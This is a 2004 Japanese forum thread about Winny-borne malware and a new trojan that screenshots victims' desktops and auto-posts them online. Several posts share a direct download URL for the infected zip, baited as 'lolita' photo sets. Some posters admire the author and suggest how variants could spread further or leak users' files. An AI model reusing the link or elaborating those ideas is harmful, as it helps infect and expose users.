【警報】Winnyを狙ったワーム・ウイルス情報 Part26

1 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/11 12:10:15 ID:j8DDPfNG] Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。 質問はテンプレを読んでからにして下さい。 読まずに質問しても「テンプレ嫁」と切り返されるだけです。 余裕があれば過去ログにも目を通してください。 なお、ここは初心者の質問スレではありません。 ■流行種 ・元祖Antinny系　・キンタマ系　・batファイル　・スクリーンセーバー　etc ■流行感染パターン ・exeの前にスペースたくさん（例：「秘密の写真.jpg　　　　　　　　　.exe」等） ・拡張子が.folderに変更されたHTMLからexeを実行させる ・autorunからbatファイルを実行させる ・スタートアップに解凍させ、再起動後exeを実行させる ■DL後のちょっとした注意 ・落としたファイルは必ずウイルススキャンする ・exeファイルはうかつに実行しない ・ファイルのアイコンが偽装されてないか確認する ■全ての感染者に共通の、絶対確実な対処方法 ハードディスクをフォーマットした上で、Windowsの再インストールをする。 上書きインストールではダメです。 現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。 前スレ 【警報】Winnyを狙ったワーム・ウイルス情報 Part25 tmp4.2ch.net/test/read.cgi/download/1093270545/l50 ﾃﾝﾌﾟﾚまとめ　www.geocities.jp/kemkzuenc/Antinny.html Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/ 412 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:22:15 ID:44EMXIte] >>411 ばーか 413 名前：[名無し]さん(bin+cue).rar [04/09/21 23:22:23 ID:uQLhGl2H] >>411 は？NOCD化パッチなんだからNOCD化されるに決まってんじゃん おまえバカ？ 414 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:25:53 ID:rBc6YMGm] >>409 ありがとうございます。盲点でしたｗ 大分テンパってたせいか気付きませんでした。 そうか、もう一回ウイルスを落とせばいいんダ。 415 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:26:54 ID:FI5JQism] >>412 駒田の真似か？ 416 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:32:42 ID:NQ2ccG6A] 止めようとしてキャンセル（と書かれたボタン）押そうとした時点で お前はnyやるﾚﾊﾞﾙじゃない 417 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:33:41 ID:NQ2ccG6A] っつーかカウント0前に強制終了しようとしまいともう既に手遅れかと 418 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:34:44 ID:YrabcswT] >411 もうどうしようもない 不安ならさっさと再インスコしろ 419 名前：[名無し]さん(bin+cue).rar [04/09/21 23:57:42 ID:bwzqiaf3] nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnキンタマ 420 名前：[名無し]さん(bin+cue).rar [04/09/22 00:13:32 ID:yTZI13Ma] 現在でてるANTINNYウイルス（亜種も含む）で、デスクトップ上の マイドキュメントやゴミ箱からも情報をとるものはあるのでしょうか。 421 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:29:39 ID:GLE7KMbZ] ageruna baka 422 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:29:42 ID:XeEl/z1A] わからない。たとえあったとしても… とられてこまる情報をマイドキュメントなどに保存する愚か者はこのスレにいないので問題ない。 423 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:39:44 ID:tsO6tEnU] おい、そんな事言ったら>>420がかわいそうだろ 424 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:43:45 ID:zxSY1Bfi] すみませｎ antinny.hってどんな症状なんすか？？ 知ってる人おしえてください 425 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:44:03 ID:y92j+6hG] >>416 　　　　　　　　　「ﾚﾊﾞﾙ」　ってなんですか 426 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:44:10 ID:iDhsW6nH] 「俺のマイピクチャ」まだーー？ 427 名前：[名無し]さん(bin+cue).rar [04/09/22 00:48:48 ID:BSHES9c3] >>420 >>424 おまえの質問に答えること　それ自体は容易い　簡単だ 感染した時の症状はこれこれこう　こういう問題が起き 何時間後発動し　隔離は･･････？　駆除は？　再インスコは････？ そんな話はいくらでもできる しかし　今　俺がそんな話を　仮にしたとしても その真偽はどうする･･････？ 真偽などどうでもいいから　聞きたいというのか････？ ククク･･････ すでにこのスレに書き込んでいるおまえには　オレの話の裏をとる術はない オレが何を語ろうと　結局ただそれを　盲目的に信じるしか道はない つまり　どんないい話を聞いても　それは単なる気休めにしかすぎないってことだ 違うか･･････？ 428 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:51:46 ID:tsO6tEnU] >>426 よし、俺が流してやる 429 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:53:30 ID:zLHcnXpB] >>425 え？ﾚﾊﾞﾙ知らないの？ ちょっと君　やばいな 公安にマークされるよ 430 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 01:04:53 ID:IONPryem] >>425 ((((((；ﾟДﾟ))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ 431 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 01:46:54 ID:8QR9/+v0] >>402 .exe入ってるファイルなんて山ほどあるんだから、 「これに.exe入ってました」という報告はイラネ ちゃんと実行させてから来い 432 名前：393 mailto:sage [04/09/22 02:06:37 ID:3vM35NCY] >>396-397 情報ありがとうございます。 一応アンインストールして入れ直してみます。 >>394 ごめんなさい。 433 名前：` ◆NgatoX7m1. [04/09/22 02:31:33 ID:HYd9vI3J] 「exe」←コレ、なんて読むのぉ？ イグジ？？ 434 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 02:45:20 ID:DFcwEF7M] いーえっくすいー 435 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 02:46:46 ID:cHFtlyXw] エグゼだろ 436 名前：[名無し]さん(bin+cue).rar [04/09/22 02:49:11 ID:vbBsFXrI] ロックマン？ バルドフォース？ 437 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 02:58:06 ID:ETFJAFZu] >>433 .avi 読み方: エー ブイ アイ .bmp 読み方: ビーエムピー .exe 読み方: エグゼ .gif 読み方: ジフ .html 読み方: エイチ ティー エム エル .jpg 読み方: ジェイペグ .mpeg 読み方: エムペグ .pdf 読み方: ピー ディー エフ .wav 読み方: ワブ .zip 読み方: ジップ ttp://support.microsoft.com/default.aspx?scid=/directory/worldwide/ja/glossary/ 438 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 03:01:32 ID:zVcTvScF] >>437 ＞.gif 読み方: ジフ ＞.wav 読み方: ワブ ギフ、ウェイブだと思ってたOTL 439 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 03:04:42 ID:cHFtlyXw] 別にウェイブでもいいだろ。 .bmpとか普通にビットマップって読んでるしな 440 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 04:20:17 ID:xUMasHO2] ＞exe 読み方: エグゼ 「エグいぜ！」　　と読んでいた・・・ 441 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 04:34:30 ID:MVU/5bip] >.exe ここの方言では「ういるす」と読む。 あまり知られてないようだが・・・ 442 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 04:52:00 ID:zLHcnXpB] >avi 読み方: エー ブイ アイ 俺は「アヴィ」と呼んでた。決して「アビ」ではない。 言っておくが唇は血が滲むくらい噛んで読めよ。 443 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 05:15:36 ID:mrLzYwy8] 口内炎になっちゃいます。 つーかもうなりました。 俺の場合、アヴィとビットマップとウェーブくらいかな、違うところは。 444 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 05:29:48 ID:F/drtkw3] >>443 房黙 445 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 08:34:56 ID:GLUesFjZ] イグゼと読んでるなあ あとギフでもいいはず 446 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 11:14:24 ID:j/18rTjQ] 岐阜みたいでナウい 447 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 13:29:49 ID:jzo10T46] お　君はヤングだね　おいらもヤングさ　フィーバーしようぜ！ 448 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 13:38:57 ID:Xh7RFvqN] 岐阜はナウでイカス 449 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 14:06:07 ID:ukACuFTt] >>437 M$もわざわざそんなもん作ってんだねｗ exeをエグゼってのはなんかゲームの世界みたいだな・・・ 450 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 14:22:35 ID:CiebCEfA] aviはアビだろ 451 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 14:38:05 ID:3USje0wW] UINGUGANDAMU 452 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 14:55:20 ID:9gdQfsyR] PC初心者板じゃないんだからほどほどに 453 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 15:05:05 ID:dQ12lTaF] じゃあお前らexeをかなで打ってみろ えぇ 454 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 15:05:16 ID:WgF4Qzwt] 感染してからここに駆け込んで助けを求める初心者がいるがなー。 455 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 15:18:16 ID:G5rN2r09] music4.2ch.net/test/read.cgi/musicnews/1095563850/15-18 これってshare利用者を狙ったウイルス？ 456 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 16:26:42 ID:9wErnaQd] >>455 513 名前：[名無し]さん(bin+cue).rar　[sage]　投稿日：04/09/22(水) 05:09:53 ID:IJUa2BF4 【ＯＳ】Windows XP SP2に2種類の脆弱性 　pc5.2ch.net/test/read.cgi/pcnews/1093226380/ 特撮エロを 　tmp4.2ch.net/test/read.cgi/download/1095345507/ 次世代共有PS2ソフト“食卓塩”開発 　tmp4.2ch.net/test/read.cgi/download/1093715748/ 【本物】WINNYお宝ファイル真贋スレ【偽物】 　tmp4.2ch.net/test/read.cgi/download/1093786275/ エロゲー板ローカルルール申請 　qb5.2ch.net/test/read.cgi/operate/1094443286/ 一般海外生活板ローカルルール申請 　qb5.2ch.net/test/read.cgi/operate/1095512881/ 【あわや】OFF板コテが20娘をﾅｶ出しﾊﾒ撮り【妊娠】 　live15.2ch.net/test/read.cgi/festival/1095597679/ 【植物】ケチャップ用トマトの甘味遺伝子LIN5について 　news16.2ch.net/test/read.cgi/scienceplus/1095696790/ 初級ネットワーク板ローカルルール申請 　qb5.2ch.net/test/read.cgi/operate/1095695740/ 被害者100名強 　やっちゃってないか心配な人へ 　list.zip 5,728 6b1ab91ddc26ac315a5592098cc4d806db9a476c 457 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 16:28:15 ID:pfnybTQU] >>455 ここはｎｙスレだぞShareはほっときゃいいんだよ。 どうしても聞きたいんならShareスレへ池。 458 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 16:36:01 ID:jzo10T46] >>454 でも　そのｎｙ初心者うぃ〜虐めるんで、寄り付かなくなってるし・・・ 459 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 16:59:26 ID:9GkE2lGq] ヌルポースもおさまり、とくに新種も亜種もでてないんだから スレが死んでてもかまわない 今更キンタマに感染しました〜っていうのを聞いててもしょうがないだろ 460 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 17:17:22 ID:jzo10T46] でも大抵　質問してくるのは指摘通りの新種、亜種以外なら圧倒的に 初心者による既存ウイルス被害者だろ？ したがって散々既出とはいえ、敷居を高くしすぎるのもどうかと思ったんだよね。 質問に答えるかどうかは　あくまで善意と個人の資質の問題だからさ。 いやなら無視していればよいわけだし・・・ 無駄レスの可能性があっても　それは許容していったほうがよくね？ もっとも速報系スレなら　まずいだろうけどさ。 461 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 18:38:20 ID:DD8VmRNY] >>453 いさい 462 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 19:18:30 ID:jIZTPKHy] 久しぶりにダウン版来たけど ウィルスやらなにやら大変になったねぇ・・・ 463 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 20:00:51 ID:6gk9JVQ6] そろそろ面白いことになるから覚悟しとけよおまいら 464 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 20:08:02 ID:AmnzJVzB] 犯罪予告ﾃﾞｨｽｶ？ 465 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:17:01 ID:bZGJWpm+] 感染するとデスクトップをキャプされて、それを定期的にうｐロダにあげて、 その画像へのリンクを特定スレに自動書き込みするウィルスが はやってるらしい。みんな気をつけて！ エロアニメ動画をみている状態のデスクトップとか晒されててﾜﾛﾀ キャプチャされたデスクトップがウィルスによって晒され続けてるスレ 角二　【うｐろだ】アップローダー案内所11【アプロダ】 idol.bbspink.com/test/read.cgi/ascii2d/1095176627/192- 関連スレ セキュリティ板　ウィルス情報＆質問　総合スレッド☆Part24 pc5.2ch.net/test/read.cgi/sec/1094383672/412- キンタマのWeb版みたいなもんなの？ 466 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:35:46 ID:9rRhf0vV] >>465 こりゃ最凶だ 467 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:36:30 ID:XwcsDIdF] キンタマ改造版だな。 節穴機能が付いてないだけましか。 そのトロイどこかで入手できないもんかなァ。激しく解析してみたいぞ(w Webとかjpeg感染タイプが出てくると、結構脅威だろーな。 nyだけじゃなくて、世界的に笑える 468 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:37:25 ID:koLWP3nB] これスレが新しくなっても自動書き込みするようになってるんだな… 469 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:40:54 ID:yMfO9itd] >>467 ほれ つttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip 中身はロリータ写真集だｗ 470 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:41:25 ID:Fk55VY7i] >>467 苺のアプロダ・1MBの1360.zipがウイルスだ 471 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:42:01 ID:JgXMRF3E] >>460 答える人に対しては誰も文句は言ってないはず。 質問に答える意欲と知識を持った人が質問に居合わせれば 今までもどんな駄レスにだって普通に返答はあった。 何でもオーライな空気なんて百害有って一利無し。必要ない。 472 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:43:34 ID:XwcsDIdF] しかし、新スレ追跡してるけど、強力だなぁ… 何に埋められてるんだろ。ほしいぃ 473 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:49:41 ID:fz84/HQL] up.isp.2ch.net/upload/c=03okari/index.cgi ここで直接見れるよ＞キャプ 474 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:50:31 ID:XwcsDIdF] 469-470 サンクスコ、解析してみる。 ご親切に、フォルダアイコンになってるね。 バイナリエディタで覗いてみただけでも、相当作りこまれてるのがわかる 「そんなスレッド／板ありません」を検知して、別スレに飛ぶ機能もある おーい、こいつメール砲機能あるみたいだぞ キンタマ亜種とか改造版じゃなくて、まったく新規に作ってるっぽいな。 しかも、かなり念入り。詳しくはもうちょっとお待ちを… 475 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:51:07 ID:6gk9JVQ6] 432 ：名無しさん＠お腹いっぱい。 ：04/09/22 21:44:41 >>412 169 ：名無したん(;´Д｀)ﾊｧﾊｧ ：04/09/22 21:39:41 ID:LP+Ly6X1 23 ：名無しさん＠ｺﾞｰｺﾞｰｺﾞｰｺﾞｰ！ ：04/09/22 21:37:54 ID:kcrfEebX 実行結果： 追加されるファイル： windows\shellsystem.exe 678kB 追加されるレジストリ： HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run shellsystem.exe :='C:\Windows\shellsystem.exe' HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run shellsystem.exe :='C:\Windows\shellsystem.exe' 476 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:53:32 ID:XwcsDIdF] ちなみに、ノートン先生最新版では検出せず。 すぐに回線切れよ＞かかった香具師 477 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:54:19 ID:MORRrkle] >>474 フォルダと思ってWクリックしたら、exe実行ですか・・・。 解析乙です。報告お待ちしてます。 478 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:54:33 ID:9rRhf0vV] これって、shareﾌｼｱﾅ晒しage→shareクリップボード晒し→苺デスクトップ晒し って進化？していったのか？ 479 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:58:33 ID:TGFooCp8] >>478 同時多発っぽい 480 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:58:58 ID:F8v+LexZ] すげーな作者！GJ！ 481 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:59:18 ID:0Y8OIFWt] Shareのってうさんくさいパッチあてるとなるやつか？ 482 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:59:25 ID:zRg+AmZG] 一度流れたら半永久的に削除不能なキンタマに比べたら救いがある？ 483 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:00:56 ID:vLbTjc4V] >>479 2ちゃん同時多発テロか？ 484 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:02:59 ID:zasm0Yrz] exe圧縮してないからバイナリエディタとリソースエディタで 中見られるな。 これ改造も容易だし、亜種出回りそうだな。 ウイルスチェッカー制作企業とかに報告が行けばいいが。 485 名前：[名無し]さん(bin+cue).rar [04/09/22 22:03:06 ID:F8v+LexZ] この作者の優しいとこはうｐロダをわざわざ2CHロダにしてくれたとこだな。 ここ消せないけど2chプロバイダ入ってないやつは24時間で見えなくなるし。 あやしいわーるどのうｐロダとかに画像うpされるようになったら最悪じゃない？？ あそこって結構長持ちだし自分で削除できないしime.nu経由で開いたらブラクラになるんでしょ？？ 作者見てる〜？ 486 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:03:33 ID:WK8P1uKu] おまいらって、初心者には厳しいが新種にはホントに嬉々とするよな(･∀･) 487 名前：[名無し]さん(bin+cue).rar [04/09/22 22:04:59 ID:tOdOsShM] >>482 誰かが纏めたのをnyに流しそう 488 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:07:17 ID:0Y8OIFWt] 感染源はどこなんだ？ 489 名前：[名無し]さん(bin+cue).rar [04/09/22 22:08:11 ID:OFqE6GX2] 私は苺で違法ダウンロードばかりしている犯罪者です news13.2ch.net/test/read.cgi/news/1095854900/ 【洒落】キンタマウィルスのWeb版 news13.2ch.net/test/read.cgi/news/1095858175/ 490 名前：[名無し]さん(bin+cue).rar [04/09/22 22:08:31 ID:1t6CyIj6] だれか単独スレ立てろ 491 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:11:39 ID:oYMFNm7J] それにしても何でこんな大勢がｸﾘｯｸしちゃったﾜｹ？ そんなに魅力的なﾌｧｲﾙだったのか？ 492 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:12:35 ID:F8v+LexZ] （写真集）（ロリータ）水原友里 （写真集）（ロリータ）相田加奈子 （写真集）（ロリータ）河瀬菜美 ってファイル名だったらしいよ 493 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:12:41 ID:g1+bfA34] ロリファイルは大人気でしょう 494 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:14:27 ID:JgXMRF3E] >>491 トリビアスレにファイルのリンク貼った奴がいたみたいだが 495 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:14:47 ID:IuQLM0ec] >>491 >>469 496 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:15:17 ID:zasm0Yrz] >>492 正確にはその全ての尻に.exeがついていたがな。 エクスプローラーの設定で、拡張子見えるようにしておかない奴らが いかにも踏む感じの奴だった。アイコンがフォルダだったし。 497 名前：[名無し]さん(bin+cue).rar [04/09/22 22:15:52 ID:lbxNYg0M] ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip の中にある　EXEのフォルダをクリックしたら感染 注意！('A`)9m 498 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:16:46 ID:cHFtlyXw] 俺でさえも(ry　が予兆だったって事？ 499 名前：469 mailto:sage [04/09/22 22:17:05 ID:yMfO9itd] >>495 ｽﾏﾝ 俺は別に引っ掛ける気は無かったんだが、 >>467へのレスなわけだし。 結局おまいも、引っかかったんだろ？ 500 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:17:29 ID:IuQLM0ec] 10 名前：番組の途中ですが名無しです：04/09/22 22:09:56 ID:VXSuEMJY これと同じウィルスが数日前に放尿スレにあったんだよな。 ﾉｰﾄﾝで検出されないってのは怖いな。 767 名前：私は放尿絵で興奮する変態です[G4zsGnQECv:40回目] 投稿日：04/09/18(土) 15:10:02 ID:GhekIZuS v.isp.2ch.net/up/63ea6ede343b.jpg 501 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:17:30 ID:EQvNm7YP] これ苺とかってアプロダに上げられた>>469から感染したんだろ？ K札動けばアップした奴（から作者まで）の特定が可能なんじゃね？ 502 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:19:48 ID:3zEu3lCZ] >>497 ブラクラ・ウイルス張るときは「ht」まで抜いてくれますかね 503 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:21:36 ID:l67SMSG4] アップローダに上げてるってことは普通に考えれば自己感染もアップローダ経由になるんじゃねーの 504 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:24:38 ID:F8v+LexZ] ウイルスだって解ってるURL貼るときは htt://strawberry.web-sv.com/cgi/up/ia/up1360.zip にしたほうがいいんじゃないの？ これなら大抵の専用ブラウザでもリンクできないでしょ？ 505 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:24:43 ID:Pp/pgXRx] 盛り上がらないニュ速板。 506 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:26:57 ID:rr+OCUUx] うｐろだ死んだ 507 名前：[名無し]さん(bin+cue).rar [04/09/22 22:28:02 ID:1t6CyIj6] うｐろだが重すぎて画像見づらいから盛り上がらん。 キンタマみたいにファイル詰め合わせ(ウィルスつき)だったら ２次感染もあってすごいことになるのに 508 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:29:57 ID:Sxm2sX2b] >>492 >>469の中身は↓だった。同じ内容の.exeファイルが三つ。 (写真集)(ロリータ)水原友里.exe (写真集)(ロリータ)相田香奈子.exe コピー〜(写真集)(ロリータ)河瀬菜美.exe 509 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:35:19 ID:0Y8OIFWt] 被害者どれくらいでてんだろ？ 510 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:36:25 ID:04BG488z] どうでもいい 511 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:36:28 ID:MORRrkle] まぁ、普通にnyにも流れるだろうな、ってか既に流れてるかもしれんね。 まぁ、感染方法は古典的だけど、webに晒すと言うのが斬新かな。 512 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:36:31 ID:31YwwZCa] www2j.biglobe.ne.jp/~tatuta/cgi-bin/ansbbs.cgi?name=comic&qes=I_am_the_Winny-user 513 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:37:02 ID:mrLzYwy8] ｳﾋｮｰ新型ｷﾀ━━━━（ﾟ∀ﾟ）━━━━!!!!!! オラなんだかﾜｸﾜｸしてきたぞ！ 画像うpだけじゃなくて感染機能もあればいいのだがな ウイルス本体と軽いファイル(kakikomi.txtとかお気に入りとか)をアーカイブしたモノもアプロダに上げてたらマジ大騒ぎになると思うんだが ろだのアドレスを無作為に書き込んだり2ch外にも書き込んだり…… 514 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:37:23 ID:6gk9JVQ6] これ自体はたいしたことなさそうだが とんでもなくエグイ亜種が出てきそうな気がする。 515 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:38:46 ID:0Y8OIFWt] これ逮捕可能じゃないの？ 516 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:39:09 ID:cHFtlyXw] クリップボードがかわいく見えてきた 517 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:39:18 ID:9PF+//Fy] 確かにkakikomi.txt晒すのが一番凶悪だな 518 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:39:49 ID:mrLzYwy8] “晒す”という斬新な被害の概念を作り出したキンタマに敬意を表する。 519 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:42:12 ID:mrLzYwy8] ろだが落ちたらうp先を変えたりはしないのかなぁ。 自分で新しいろだを探してうpするようにできてたら最強だけど…… 520 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:43:36 ID:6gk9JVQ6] ふと思ったんだがこいつを海外に流したら気づきようがないんじゃない？ 521 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:46:26 ID:wdHMs2ep] >>520 実害もたいして無いような 522 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:47:27 ID:F+6I/erB] というか外人のを見ても面白くない 523 名前：469 mailto:sage [04/09/22 22:52:12 ID:yMfO9itd] 本スレで、俺の書き込みのコピペがされてる模様・・・・＿|￣|○ 本スレから、さらに感染拡大か(´・ω・`)ｼｮﾎﾞｰﾝ 524 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:53:08 ID:zasm0Yrz] >>515 捜査協力しないと苺がやられるだろうね。 だから、結構なところまでは絞れると思う。 でも、ネカフェとかからのアップだったら、操作はそこまで。 525 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:53:42 ID:mrLzYwy8] 国外にまで出るとさすがに面倒なことになる悪寒。 国内でやって欲しいな。 あーでも2ch以外でもやってくれると被害者続出して社会問題化……したりはしないか。 526 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:54:26 ID:6gk9JVQ6] まぁ落ちたきたexeを実行するやつはそんなにいないでしょ 527 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:54:55 ID:RSK53XEO] 最近のネカフェって監視カメラ置いてるから、仮に個室だったとしても 通路を移動する時に激写されてる悪寒。 528 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:56:21 ID:5TIb9wHl] フォルダ偽装の.exeだから 踏む奴はそれなりに居る予感 つかダミースレの勢い凄いな 529 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:57:43 ID:zasm0Yrz] ２ちゃんってこういうとき、該当の板って絶対止めないよな。 とくにうｐろだとか。 530 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:58:45 ID:iDhsW6nH] さぁ盛り上がってまいりました（・∀・） 531 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:59:15 ID:cHFtlyXw] どうせTorとか経由してうｐしてんだろ。特定不能 532 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:01:53 ID:lWXOwM8A] 誰か今回の件まとめてくれ。 533 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:05:11 ID:aJET+JT9] また新種かい、nyと洒落に流れてるんか 534 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:05:32 ID:VPSOXf5B] >526 nyやってる奴ならアイコン偽装は常識だが ｎｙやってなければ普通に引っかかると思われ 拡張子を表示してない・詳細表示もしない香具師もいっぱい居るだろうから 535 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:06:54 ID:zasm0Yrz] >>534 Explorerのデフォルトが、表示しないようになってるからね。 536 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:07:25 ID:iDhsW6nH] これはメル欄に回数も申告してくれるのか 537 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:09:56 ID:baZulnI6] 逮捕可能らしいよちょっくら被害届けだしてウイルスの作者をどんな奴かみて見ようじゃないか 面白くなってきたｗ 538 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:10:58 ID:6gk9JVQ6] >>534 うｐロダから落としたファイルでしょ？ 信用のできなさはnyとそう変らんと思うがねぇ。 539 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:13:03 ID:mrLzYwy8] こいつの応用で勝手に犯罪予告カキコとか、ある主義主張を書き込みまくるとかできそうだな。 540 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:14:32 ID:iDhsW6nH] >>539 ！！！！！！ 541 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:16:31 ID:FFBqPrVy] 犯罪予告カキコしたら作者100�l捕まるよ 542 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:17:55 ID:zasm0Yrz] >>541 追尾できればね。 543 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:17:56 ID:baZulnI6] >>541 っていうか色んな所から命を狙われると思われ 今でさえヤバイかもしれんのに 544 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:17:57 ID:oAAlAMOi] nyみたいに特定のp2pにしか流通するんじゃなくて、Web晒しともなると アンチウイルスのベンダー各社の対応も早いと思うけど、そもそも アンチウイルスソフト常駐させずにヤバげなの落とす香具師も多いしな〜 545 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:18:03 ID:cHFtlyXw] 被害内容：エロゲやってる所を晒されました。。。 546 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 